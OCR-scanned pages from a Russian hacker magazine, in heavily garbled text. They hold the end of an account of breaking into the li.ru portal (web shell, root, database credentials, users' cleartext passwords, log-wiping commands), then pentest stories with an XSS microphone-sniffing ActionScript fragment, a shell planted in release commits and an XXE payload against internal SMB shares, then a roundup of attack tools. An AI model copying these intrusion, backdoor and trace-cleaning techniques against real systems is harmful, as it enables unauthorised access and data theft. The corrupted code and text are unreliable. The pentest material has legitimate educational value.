иісІ=0(гоо1:^ §ісІ=0(гоо1:^ §гоир5=48(арас6е) 

Дальше, чтобы упростить работу с гооі-правами, я восполь- 
зовался модифицированным шеллом ѴѴ50 ( Ы11у/6Са7хМ ) и через 
несколько минут мог свободно рулить всем сервером через веб. 
Затем я нашел конфиги, из которых можно было узнать пароль рута 
от БД тузці. Это был Ьазб-скрипт для бэкапа: 



Кстати, уже после заливки я решил заглянуть в сам уязвимый файл: 



/боте/Ьаскир/сІо-Ьаскир. б6 



$Ь56оілЮе-Раи11: = -РаІБе; 

$б6оц = Рипс::Р05ТСЕТГ5'); 

$еѵ = Рипс: :Р05Т6ЕТ( ’еѵ' У. 

$соп1:еп1: = ' ' ; 



і1{іі1е_ехІ5І:5(5ІТЕ_РАТН. 'тосІиІеБ/' .$б6ом. '/' .$б6ом. 

' .сІаББ.рбр' )) 

І_ 

іпс!исІе(5ІТЕ_РАТН. 'тосіціез/' .$б6оіл/. '/' Лзбоы. ' .сІазБ.рбр' ) ; 
$оС1а55 = & $5боы; 

$соігЬеп1: = $оС1а55->сІІ5ра1:с6егП : 

} 

еізе 

$Ь56оыОе-Раи11: = 1:гие; 

Как видишь, в этом коде просто-напросто отсутствует фильтра- 
ция. Позже, когда я сообщил администратору ресурса о найденных 
уязвимостях, он добавил в этот исходник вот такую строчку: 

і-Р (($б6оы) && рге^ ша1=с6( ' / л [а-г\-\_]+$/і ' . $б6оы)) 

{ ... > 



Кстати, надо отдать должное админам — сбрутить пароли, про- 
писанные в скрипте, было бы достаточно проблематично. Вообще 
на сервере было еще много любопытного, но я решил остановить- 
ся, перевести дух и детальнее изучить БД. База оказалась доволь- 
но интересной. Весила она много, поэтому я решил просмотреть 




Протрояниваем админку через вторую активную Х55 
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Прощай, Лирушечка! 



ІРощвд: г ХйСТ- а -* . ' г “ ДбТ4 ; 

Ер*укт : НоіШд/ь.9 ( и,’іпдд*і КГ 6 г і)ЛррІе1УсЫИ/ьЗБ<? {ЕШи« ЬЬ; Мой) БіЗІап/зЗЯ-? 

Удй'ІСІІЕЕЫН норг ; &74?І4; ТіСП СКШСПГ11КЯ г 

Спуда, пришел Ьс^://|^«^^іѵлп^ег^^е^ги/|оитл^_зсп1□|у .рЬр^члігпаІкЗтуз^ 

Строка ипросй : Іап^ гіі 

ЬЬаЛйіілея-і 

ЬЬиигіЛ"739 

ЬЬра»^г^ - ^зтмздазсі ’+ІѴ *й< 

ІЬи игл ішіс - Ѵо 
|іжі(1-о 

аіѵиМ" Ь 1^94. 3 1Г17 

ГІіЬх 



Кукисы админа 




№№№N6 



Вся информация 
предоставлена 
исключительно в 
ознакомительных 
целях. Ни редакция, 
ни авторы не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 



Первый вариант 
запуска ѴѴ50 от 
имени гооі: 

аоо.аІ/ИЮНС . 

Второй вариант, 
который мне, в 
отличие от первого, 
помог: 

аоо.аІ/оБХсб . 

Еще один вариант, от 
Вооіеап: 

доо.дІ/РУгѵ . 



гш 

На нашем дискеты 
найдешь видеоро- 
лик с Ргооі оІСопсерІ 
получения прав рута 
на сервере Іі.ги. 



ІШЛ 

В процессе пентеста 
не забывай про 
файл .ЬазІі_ІіІ5- 
Іогу: зачастую в 
нем находится 
много полезной 
информации. 



Мыв аккаунте администратора ѴаІе2 



только лишь ее малую часть. Как я уже писал выше, почта Іі.ги 
хостится в боодіе Аррз [ д.ііѵеіпіегпеі.ги — это почтовый сервис 
проекта). Однако вся авторизация проходит именно через сам Іі.ги, 
а куки устанавливаются скриптом зеІсоокіе.рЬр, находящимся на 
порутанном серваке. Таким образом можно было с легкостью пере- 
хватить сессию и поиметь около ЮОк (а может и больше) аккаунтов 
Іі.ги, что называется, не отходя от кассы :). Не менее занима- 
тельными были таблицы ІІзегз, Ііги изегз и дтаіі соокіез (снова 
смотри на скриншот). Также я обратил внимание на один текстовый 
файл, который лежал в корне сайта и был доступен извне, — там 
нас ожидала очень любопытная инфа: 

...пропущено много информации. . . 

[Іо^іп] => ІМ іскІМате 
[сіотаіп] => Іі.ги 
[раззыогсі] => 1:и1:_ра55 
[рав5могс1_ге] => 1=и1= разз 
■ [пате] => Оксана 

...пропущено много информации... 

) 

ІР: Аггау 

( 

[ехіі і р] => 91. ххх. ххх. 236 

[_іп1:_ір] => 91. ххх. ххх. 236 



Какты уже понял, в этот таинственный файл в режиме онлайн 
записывались Р05Т-запросы с попытками авторизации и реги- 
страции пользователей сайта! Таким образом мы спокойно могли 
бы перехватить сессию или пасс юзера, которые записывались в 
лог в открытом виде, даже без получения доступа на сервер! Осо- 
знав, что похек вышел полным, окончательным и бесповоротным, 
я решил остановиться и убрать за собой. В этом мне помог лог- 
клинер от 5ЬасІ05 ( аоо.аІ/Вебп) ): 

біі- 3.2# ,/1о§ -и гооі: -а 100.100.10.1 

[ ОК ] 

саі: /1:тр/1:трб1е2о5ХУХ > /ѵаг/іо^/зесиге 
зесиге с!еап1п% 

[ ок ] 



саТ /Ттр/1:трб1еМсІ21ІсС > /е1:с/Іі1:1:рсІ/1о§5/еггог_1о§ 
арасбе 1о§5 с1еапіп§ 

[ ОК ] 

НАПОСЛЕДОК 

Так закончился этот занимательный взлом крупнейшего (РР 9, ТИц 
43 000) ресурса Ііѵеіпіегепеі.ги . Естественно, обо всех багах мы 
сообщили администратору портала, после чего все найденные уяз- 
вимости были оперативно закрыты. Как видишь, даже такие попу- 
лярные и авторитетные проекты, как любимая многими лирушечка, 
вполне могут иметь банальные (а иногда и просто глупые) баги. ИЛ 
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ЗАЩИЩЕННОСТИ 

ВЕБ-ПРИЛОЖЕНИЙ 



Веб-приложения многочисленны и разнообразны. И уязвимости в них порой встречаются интересные 
и нестандартные. Если выкинуть банальные ХББ, 50І_і, РЕІ, І_РІ и прочие С5РЕ, то останутся весьма 
забавные и познавательные баги, о которых я и постараюсь рассказать в этой статье. 



ВВЕДЕНИЕ 



Жизныакая, какой ты ее делаешь. Если от- 
носиться к работе именно как к работе, она 
никогда не станет ничем большим, чем работа 
(извини за тавтологию, но все сказанное здесь 
— чистая правда). В отличие от пентеста, 
где перед нанятым человеком стоитзадача 
«взломать хоть как-нибудь», простой аудит веб- 
приложений зачастую бывает скучным и уны- 
лым — здесь специалист пытается взломать 
цель всеми возможными способами. Отсюда 
и вытекает разница в цене и в сроках выпол- 
нения работы. Зачастую искать сотую Х55'ку 
бываеттакутомительно, что теряется всякий 
запал, с которым начинал. В такой ситуации 
(чтобы уж совсем не превратиться в Асипеііх 
ѴѴеЬ Зесигііу Зсаппег) я начинаю думать и при- 
думывать. А именно — делать какие-то стран- 
ные предположения и проверять их. Нередко 
это приводит ко вполне определенным резуль- 
татам. Далее статья будет разбита на главы, 
каждая из которых — это отдельная история 
реального проекта по анализу защищенности 
веб-приложения. А если говорить проще, то 



и целая история реального взлома (отличие — 
только в санкционированности моих действий 
владельцами ресурсов). А теперь — к делу. 



ЗАЧЕТНАЯ СЕССИЯ 



■Л Первая история посвящена аудиту 
одного банк-клиента. Попал этот заказ ко мне 
совершенно случайно, в 2009 году, когда такие 
структуры, как банки, казались для меня заоб- 
лачными перспективами. Проект был класси- 
ческим черным ящиком без исходных кодов. 
Радостно бросаюсь вбивать ІІРІ_ и одуреваю 
отувиденного — одна форма авторизации. На 
таких штуках можно сделать Х55 или 5СИ_і, но 
если ни того, ни другого нет, то руки опускаются. 
Меня поразило отношение заказчика к этому 
проекту: больше никакой входной информа- 
ции не было. Типа — проверяйте как хотите, 
логины не дадим. Стало совсем невесело, когда 
ОігВизІег сказал, что ничего не нашел, и анализ 



хоста показал только отдельностоящий сервер. 
Дальше события разворачивались по такому 
сценарию: 

01:10 Все закрыто авторизацией. Смирились, 



надодуматьдальше. 

01:15 Поставим брутиться логи н-пароль. А что 
еще остается делать? Тем более что бло- 
кировки за попытку подбора нет, и капча 
не выскакивает. 

01:40 НабрутилосьсІето/сІето123. Приятная 

новость, но даже формата логинов по этим 
данным непоймешь. 

01:50 Ничего внутри аккаунта нет, мало прав. 
Это какой-то разработческий атавизм, от- 
сутствует практически весь функционал 
кабинета. 

04:20 Можетбыть, стоитподобратьидентифи- 
каторсессии?Тоестьвзятьимеющийся и в 
этом же формате поперебирать другие на 
удачу. Самый простой метод такого пере- 
бора — битфлип. Строка представляется 
в видебитов, и каждый из нихпоочереди 
меняется на противоположный (0 — на 1, 
а 1 — на 0). То есть если было 101 0, оно пре- 
вращается в 001 0, а затем — в 1110. Биты 
собираются обратно в строку и отправля- 
ются веб-приложению на проверку. Если 
все хорошо, то вернется страница кабине- 
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Битовое представление идентификатора сессии. Переставляем по биту и проверяем 



та, если нет — страницаавторизации. 

05:13 Нашелся один идентификаторсессии, 
отличающийся отнашего на 1 бит. Но при 
этом функциональная часть кабинета 
уменьшалась, теперьвнутри вообще 
ничего не работал о. Дал ее следовали 
мучительные раздумья и попытки понять, 
почему же та к происходит. 

06:01 Тотбайт, куда входил этот бит, решено 
было перебрать от 0 до 255 и посмотреть, 
чтобудет. Офигеть! Байткодировал при- 
вилегии пользователя и водномзначении 
открывал функционал администратора 
с возможностью загрузки произвольных 
файлов и остальными плюшками! Міззіоп 
сотріеіе :). 



ГОТОВИМ РЕДКИЕ 
БЛЮДА ИЗ Х55Г“^ 



Во второй истории я расскажу про аудит систе- 
мы проведения онлайн-конференций. Однако 
это лишь одна сторона задачи, на самом деле 
система была более обширной, но я выделю 
лишь ту ее часть, которая будет описана в дан- 
ной статье. 

Итак, система снова была черным ящиком 
без исходников. Разработка под фреймворком, 
ОРМ и прочие прелести жизни. Далее все про- 
исходило примернотак: 

22:00 Найдем инъекцию, и все будетхорошо. 
09:10 А может, и не найдем инъекцию :(. 

11:40 Ладно, запустим снифать кукисы храни- 
МОЙХ55. 

19:20 Молодцы, привязали сессию к ІР:(. 

02:20 Нам нужны свежие мысли. 

03:13 Ладно, если саІІ-центр общается с поль- 
зователями голосом, попробуем снифать 
микрофон через РІазЬ. 



в этот проект и написанному на РІазЬ, мы пред- 
положили, что если засунуть в хранимую Х55 
свою флешку с другого домена, то можно будет 
подключиться к микрофону оператора колцен- 
тра и получить оттуда какую-нибудь полезную 
информацию. Сам по себе процесс атаки не от- 
личается простотой, так как АсІоЬе уже закрутил 
все гайки и без дополнительных диалоговых 
окон микрофон не включится. Но, какуже го- 
ворилось ранее, этот проект имел функционал 
голосового чата, а значит, операторы колцентра 
привыкли к предупреждающему окошку РІазЬ. 
Таким образом возникало вполне оправданное 
предположение, что они подтвердят использо- 
вание микрофона и на другой странице (там, где 
у нас находится хранимая Х55). Ниже находится 
АсІіоп5сгірІ-код, реализующий эту задачу: 



АсЬіоп5сгір~Ь для работы с микрофоном 

ргіѵа1:еТипс1:іопіпі1:П : ѵоісі { 

пс=пеіл/№1:Соппес1:іоп ; 

пс.соппесЕТ л 

шіс=МісгорІіопе.^е1:МісгорІіопеО ; 

тіс.га1:е= ; 

пс . асІсІЕѵепІіІізІіепег ( 

№1:51:а1:и5Еѵеп1:.МЕТ_5ТАТЦ5. сбескСоппесЕ^ : 

} 

ргіѵа1:еТипс1:іопсІіескСоппес1:(е:Ме1:51:а1:и5 

Еѵеп1:){ 

^оосІ=е . іп-Ро . сос!е== 

Л 

-_С-_ , "»* 

іііііз .аІіІіасІіАисІіоГтіс^ : 

Іібіз.риЬІізІіГзІігеат. )_; 

н 



щ Ріа І с*й№ н Оеіеіе *4 геайопіу 



Д І_ГЧІ М Ь ІІсе І_ц№ргСі Э-ѴС ЬРрОі ВаУс 2 іоКСд 



ИозЮлІу 



ріагаіо В 



КирОлІу 



• Полный пример 
флешки для работы 
с микрофоном: 
ЬН.1у/пЕ!]2и: 

• геріау-атака на 
ѴіеѵѵБІаІе: 



• очень хорошая 
Хабра-статья 
по ѴіеѵѵБІаІе: 
НаЬгаНаЬг.ги/Ыодв/ 
пег/119537: 

• еще немного 
забавной практики 
использования 
ХХЕ под 

ІіЬхтІ: Ьіиѵ/ѵѵѵХіРп. 



Как видно из таймлайна, кроме хранимой 
Х55 для НСД в первый день проверки ничего не 
было найдено. Ситуация усугублялась тем, что 
сессии были привязаны к ІР (что само по себе 
встречается только в 3% проектов). Но так как 
мы знали, что общение пользователя с саІІ- 
центром происходит по чатику, встроенному 



«хріпіііепгіру 1 2 умг 201* 



Сессия выглядит как обычно, но внешний вид ни о чем не говорит 
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взлом 



І?иі № 

«ГРМТТ.РЕ ігі* { 

тішт «г-і ИТІ» ПІРМН І ЛП> 
^рШІГг «»0 Фтъігя г иіМ, іМ І4і^> 
->ілтг лѵі ігііір 

<ГИІГТГ щщѵ -4 шттш МШ.Щ.І.ЦЁО 
ММ ‘ЬІШ.М.ІЛ^'іі 



чршггі> іті-ѵі мт 
-ІГАЦТТ* т*ы ТОП* 
іштт» іхѵ-н тти нм о.*. і'.-г* ■ 

*'НІТТГ ггш-ФЛ ЗПП* НЛ.Г.І.ііСГ* 
*Г^У|Т?)Г мг+ф і <5г1ГГ# ИРІ » ІЫГІ'» 



ХМЬдокумент для атаки на ресурсы 
локальной сети МісгобоК 



Суть простая: снимаем микрофон 
пользователя одного домена и передаем 
аудиопоток на другой (свой) домен, затем 
слушаем в спокойной обстановке. Ложка 
дегтя: в реальной жизни не так-то про- 
сто снифать микрофон человека. Все дело 
в законе — даже при заключении договора 
на проверку ресурса и получение доступа 
никто не дает право нарушать Конституцию 
и 152-ФЗ, внедряясь в личную жизнь людей, 
пусть они и операторы саІІ-центра. Тем не 
менее, в конкретном случае данного аудита 
мы нашли способ согласовать и легально 
использовать микрофон операторов. Веселая 
история № 2 завершилась тем, что в потоке 
аудиоданных пролетела часть пароля от 
корпоративной почты, которую забывчивый 
оператор проговаривал как скороговорку при 
логине в саІІ-центр :). Мораль — используй 
все возможности: даже самые неординарные 
векторы могут принести результат. 



БОЛЬШОЙ ПОРТАЛ 



Третий рассказ пойдет об аудите боль- 
шого портала. Если ты был на йеіхоп Риззіа #7, 
то в моей презентации Риппу-Наскз третьей 
историей был взлом скрипта, предназначен- 
ного для восстановления пароля. Но я решил 
выкинуть ее в пользу новой, более интересной 
истории, приключившейся уже после йекоп 
Риззіа #7. 

Итак, большой портал. В таких случаях, 
как правило, вывод ошибок и прочие пре- 
лести будут закрыты. Даже при обнаружении 
какой-либо приличной серверной уязвимо- 
сти ее будет не так-то просто использовать. 
Причем это условие соблюдается, даже если 
не будет какого-нибудь ѴѴАР, надзирающе- 
го за входным потоком данных. Для таких 




проектов (уже после данной истории) я 
всегда использую один и тот же прием. Итак, 
поехали: 

14:10 Какойты большой и красивый! 

15:22 Ну,тутна полгода скриптовхватит. 

16:10 Надоужечто-нибудьнайти:(. 

17:03 Пробрутим поддомены. 

17:30 Так, на Ьеіа.ботаіп.сот нашли403 
РогЬісИеп. 

17:40 Пробрутим заголовокХ-РеаІ-ІР 

и Х-РогѵѵагсІесІ-Рог по локальным адресам. 
18:10 Набрутили внутреннююсетку, зашли. 
18:30 На бете куча левыхскриптовдля дебага 
и совсем простые пароли. 

18:55 Естьвеб-шелл. 

19:30 ОСхорошонастроена, но вотЗѴІЧ... 

20:01 Заражаем пару скриптов в коммитах 
и чистим логи. 

10:00 Парни выкатили новую версию, веб-шелл 
набоевомсервереполучен :). 

Таким образом, мы зашли через заднюю 
дверь, атаковали бета-версию, заразили шел- 
лом очередной релиз, а когда его перенесли на 
боевую машину — получили шелл и на ней. 



ШИФРОВАННЫЙ ѴІЕѴѴ5ТАТЕ 



В четвертой истории речь пойдет про 
аудит А5Р.ЫЕТ 4-й версии. Эта штука пьет 
много крови и ест много мозга :). Туттебе 
и фильтр Х55, который срабатывает на любую 
букву после «<», и ргерагесі-зіаіетепіз, 
и прочая фигня. Особенность А5Р.ЫЕТ — 
ѴіеѵѵЗіаІе ( ЬіпдесІ.іі/бАсдб ). В простейшем 
случае формат ѴіеѵѵЗіаІе представляет из 
себя простую Ьазе64-кодированную строку, 
в которой можно найти сериализованное 
представление объекта. В таком случае с по- 
мощью изменения свойств объектов можно 
было много чего нарушить в логике прило- 
жения, получив затем интересные результа- 
ты. Осознав это, парни из МісгозоіЧ решили 
зашифровать данную строку, сохранив ключ 
на сервере. Учитывая что строка создается 
только на стороне сервера, здесь нет ничего 
плохого. Но такие штуки также можно атако- 
вать с помощью вызова ѴіеѵѵЗіаІе с разных 
страниц, смешивания их с контроллерами 
и анализа ответа сервера. Таймлайн: 

12:10 Привет, йоШЕТ! 

12:50 Привет, Х55-фильтр! 

13:45 Будем искатьобходы логики. 



параметр*- ляейо р а $п ріауо^ 

Дкту і к камера и млкрофопіу Іф 

ѵіѵлѵ дра со гг адпрашноаш доступ л 

И «оѵс-рс п микрофону. 

■платъ Равдс-ігіТй', то &ас ѵц-ут 



запгішшіть. 









Предупреждение РІазИ об использовании микрофона 



13:51 ѴіеѵѵЗіаІезашифрован :(. 

14:41 Попробуем взломатьавторизацию. 

15:01 Восстанавливаем свой парольна почту 
и получаем код активации. 

15:30 Вводим код активации на сайте и смо- 
трим, что происходит дальше. 

15:31 После ввода валидного кода отправ- 
ляется второй а)ах-запрос с логином 
и ѴіеѵѵЗіаІе. 

15:32 Открывается диалогввода нового пароля. 

15:33 Отправляем запрос а)ах еще раз — с тем 
жеѴіеѵѵЗіаІе, нологином асітіп. 

15:34 Открывается диалогввода нового пароля. 

15:35 Пробуем авторизоваться подабтіп с но- 
вым паролем. 

15:36 Получаем профити админку. 

Пишете на фреймворках? Проверяйте 

логику! 



5 И ХЕ - ХЕ - ХЕ - ХХЕ! 



Пятая история также новая, она тоже 
случилась уже после моего доклада на йекоп 
Риззіа #7. Как бы странно это ни было, но 
снова ХХЕ, тот самый, с помощью которого 
был взломан Яндекс, тот самый, про который 
Андрей Петухов написал целую статью в этом 
же номере ][. 

14:10 Привет, ^ѵа! 

14:15 Гдетуту насХМБна вход принимается? 
15:20 Файлы читатьможем, нотолком ничего не 
получаетсядаккакна винде нет столько 
полезныхконфигов. 

16:30 Что если засунуть в ХХЕ локальные сам- 
бы? 

16:35 Прикольно, он авторизуется на них с пра- 
вами сервера (что логично). 

17:00 Готовэксплойтдля перебора локальных 
адресов и чтения файлов с дисков. 

19:20 Нашли пару адресов с файлами С:/ 

раззѵѵогсі.іхі (утрирую названиефайла). 

< ! РОСТУ РЕ Ііезі: [ 

< ! ЕІМІТТУ ххе-1 5У5ТЕМ '\\192 .168 Л Л\С$' > 
< ! ЕІМІТТУ ххе-2 5У5ТЕМ 1 \\192 . 168 . 1 . 2\С$ 1 > 
< ! ЕІМІТТУ ххе-3 5У5ТЕМ 'ХМЭг.ІбВ.І.ЗХС^' > 



0> 

Воттак незатейливо и просто можно ша- 
риться по локальной сети МісгозоЙ через ХХЕ- 
уязвимость. Напомню, что за один ХМІ_-запрос 
можно пытаться читать сразу много файлов, 
потому что ЕІЧТІТУ аддитивны в ХМБ-теле. Все 
очень просто. Просто, но красиво и весело, не 
правда ли? 



ЗАКЛЮЧЕНИЕ 



Вот и все. Надеюсь, было занимательно. По- 
старался изложить простую истину: никогда не 
сдавайся, ищи разные методы и пробуй новые 
идеи. На все вопросы отвечаю в блоге или твит- 
тере ШОгпрр. До новых встреч на страницах 
журнала! □С 
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ѴАІЙАМО 



ЗІШЕЙ5ТОНЕ МАі_І_ОРѴ 



САЙТНАЕЕ 



ѴАІЕМСІА 



МАХ 



ЙРМКІАИОЁ 



5ТОѴѴЕ 



йотайу еойОЕО ѵѵнеёі.$ «иквинокіи&йР імтейіаОО$йр орміметои ѵлиООТ этрір 



иіѵАйЕ - еюае вьаск мніео $рокё$ 



МІЮЕиО-НѴРЕК ЗІІ.ѴЕВ 



ІМОѴ 500 МАЙСЮ 8ЕРАН6 20ЮЕЙ САОТѴЕІЛ. ЮНОйіМА ІАЙАМА 



8НЕТТЕЯГ0ІѴ 



интернет магазины ѵѵ ѵѵѵѵ. а 1 1 га сі ги мѵѵѵѵ.ргокоіа.пеі 



Розничные магазины 

Моста ул Элеггрэдизся д 14/2 (ЭД5)23МСШ 
Москва ул Островитянова ап 29 (499)7244044 
С-Петербург Ешер-ининсинй проспект д.1 (812)603-2610 



Оптгаьсй отдел 

Моста уп Зпекград>іая Д Юстр 32 

(4551231-2363 

ѵтчѵ.ічоігасі.ри 



Интернет магазины 
ѴѴ^.лІІічнЗ.гу 

{АЩ 73^2327 1 МО / В72-7228 

^тѵ.ргокоіа.псі 

(312} 603-261 0 / 603-2611 



Реклама 




взлом 



Х-ТООБ 

СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 




Автор: 

ХСѲСІ2 

ЦШ.: 

ЬіМу/бНеѴзе 

Система: 

*піх/ѵѵіп 





Автор: 

Атіі Маіік ака 
ОоиВІе_2егО 
цкі.: зесигііухріосіесі. 
сот/іехрІо.рНр 
Система: *піх 





т длязоьмар 



Наверняка тебя неоднократно напрягала 
рутина при работе с зцітар из консоли. Теперь, 
с появлением 3111-интерфейса для этой попу- 
лярной ][-тулзы, эксплуатация 50 1_- инъекций 
станет во много раз проще и приятней! 

Итак, сам 3111 написан на питоне с примене- 
нием Ікіпіег и ик. Инструкция по установке и 
запуску этого аддона под ѴѴіпсІоѵѵз выглядит 
следующим образом: 

1. Качаем питон ( асііѵезіаІе.сот/асііѵеруіЬоп ) 
и зцітар ( здітар.огд ). 

2. Помещаем исходник 3111 в папку, где лежит 
здітар.ру. 

3. Запускаем. 

Это все. Если ты уже был знаком с здітар, то 
сразуже разберешься со всеми настройками 
и фичами; если нет, то обрати внимание на 
вкладку «НеІрМе» — здесь хранится полный 
мануал по всем командам тулзы. Для начала 
работы с 3111 тебе необходимо выбрать/убрать 
опции в главном окне и нажать на кнопку «деі- 
диегу». Запрос к здітар отобразится в «диегу 
Іо здітар». Перед нажатием на кнопку «зіагі» 
ты сможешь отредактировать запрос путем до- 
бавления недостающих настроек. Также автор 
рекомендует ограничиться десятью потоками: 

здІтар/ІіЬ/соге/зеТТіп^Б . ру 
МАХ_І\ІІІМВЕК_0Р_ТНКЕА05 = 10 



СЕТЕВОЙ ПЕНТЕСТ ВМЕСТЕ С 2ЕХРЮ 



2ехрІо ТооІкМ: — это питоновский скрипт, 
предназначенный для проведения различного 
рода пентестов. Помимо простого, но 
одновременно функционального интерфейса, 
2ехрІо выделяется наличием шести 
поведенческих модулей, предназначенных 
для различных сетевых проверок. К примеру, 
такие проверки проводятся для гріпд, 
гагрсасЬе, гісрзсап, гптаррогі, ПІесора и 
так далее. В дополнение к этому в составе 
утилиты находятся также и модули для 
реализации МІТМ-атак (тап іп 1Ье тісИІе). Из 
других особенностей проги можно выделить 
следующие: 

• инжектвыбранныхмодулей в выбранные 
процессы; 

• криптшелл-кодов; 

• работа с манипулятором пакетов 5сару. 

Начать работу с тулзой очень просто: запускай 
скрипт и вводи одну из команд: 

• епитегаііоп (сканы сети); 

• ехріоііз (сплойты); 

• тііт (атака «человек посередине»); 

• аиіорѵѵп (попробоватьавтоматически 
поиметь выбранную систему); 

• сопНнастройкиутилиты); 

• Ьеір (помощь); 

• аЬоиНо программе); 

• ехіі(выход). 



СЛУЖБЫ КАТАЛОГОВ РЕѴЕАІ_ЕБ 



При проведении пентеста какой-либо 
организации очень часто бывает полез- 
ным узнать о том, какие службы каталогов 
крутятся на исследуемом сервере/серверах, 
ведь там вполне может храниться очень 
важная информация об авторизационных 
данных работников этой самой организации. 
Поможет в этом тебе замечательная утилита 
ОігесІогуЗсаппег, которая работает по тех- 
нологии Ппдегргі пііпд'а и удаленно детектит 
все наиболее распространенные службы: 
ІМоѵеІІ ейігесіогу, МісгозоЙ Асііѵе йігесіогу, 
ОрепЮАР йігесіогу, 5ип Опе йігесіогу, 
ІМеІзсаре Оігесіогу, ІВМ І_оІиз Оотіпо, Огасіе 
Оігесіогу. Тулза работает как в локальной 
сети, так и в интернете. 

Особенности сканера: 

• удобный и интуитивно понятный интерфейс; 

• сохранение отчетов в НТМІ_-файл; 

• стоп/пауза в любой моментскана; 

• скан одной или сразу несколькихсистем; 

• локальная установка и удаление сканера; 

• удобный вы вод логов скана в режиме реаль- 
ного времени; 

• использование ІМоѵеІІ — ОрепЮАР 50К. 

Помимо всего прочего эта утилита будет 
полезна системным администраторам для уда- 
ленного составления каталога своих собствен- 
ных Оігесіогу-серверов. 
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